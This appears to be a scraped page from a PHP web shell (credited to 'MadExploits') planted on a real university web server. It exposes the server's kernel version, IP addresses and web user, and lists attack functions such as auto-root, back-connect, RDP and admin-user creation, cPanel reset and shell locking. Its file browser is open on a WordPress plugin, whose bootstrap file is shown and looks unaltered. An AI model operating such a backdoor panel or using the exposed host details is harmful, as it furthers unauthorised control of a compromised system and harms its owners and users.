Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.116.47.194
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-content /
plugins /
extendify /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
.gitattributes
110
B
-rw-rw-r--
LICENSE
17.62
KB
-rw-rw-r--
bootstrap.php
1.44
KB
-rw-rw-r--
config.json
557
B
-rw-rw-r--
extendify.php
2.71
KB
-rw-rw-r--
readme.txt
13.24
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap.php
<?php /** * Bootstrap the application */ use Extendify\PartnerData; use Extendify\Config; use Extendify\Insights; use Extendify\Launch\Admin as LaunchAdmin; use Extendify\Library\Admin as LibraryAdmin; use Extendify\Library\Frontend; use Extendify\Assist\Admin as AssistAdmin; use Extendify\Chat\Admin as ChatAdmin; use Extendify\Draft\Admin as DraftAdmin; use Extendify\AdminPageRouter; use Extendify\Affiliate; if (!defined('ABSPATH')) { die('No direct access.'); } if (!defined('EXTENDIFY_PATH')) { define('EXTENDIFY_PATH', \plugin_dir_path(__FILE__)); } if (!defined('EXTENDIFY_URL')) { define('EXTENDIFY_URL', \plugin_dir_url(__FILE__)); } if (!defined('EXTENDIFY_PLUGIN_BASENAME')) { define('EXTENDIFY_PLUGIN_BASENAME', \plugin_basename(__DIR__ . '/extendify.php')); } if (is_readable(EXTENDIFY_PATH . 'vendor/autoload.php')) { require EXTENDIFY_PATH . 'vendor/autoload.php'; } new PartnerData(); new Config(); new Insights(); new LaunchAdmin(); new LibraryAdmin(); new Frontend(); new AssistAdmin(); new ChatAdmin(); new DraftAdmin(); new AdminPageRouter(); new Affiliate(); require EXTENDIFY_PATH . 'routes/api.php'; if (is_readable(EXTENDIFY_PATH . '/updater.php')) { require EXTENDIFY_PATH . 'updater.php'; } add_action('init', function () { load_plugin_textdomain('extendify-local', false, dirname(plugin_basename(__FILE__)) . '/languages/php'); }); // To cover legacy conflicts. // phpcs:ignore class ExtendifySdk { }
Close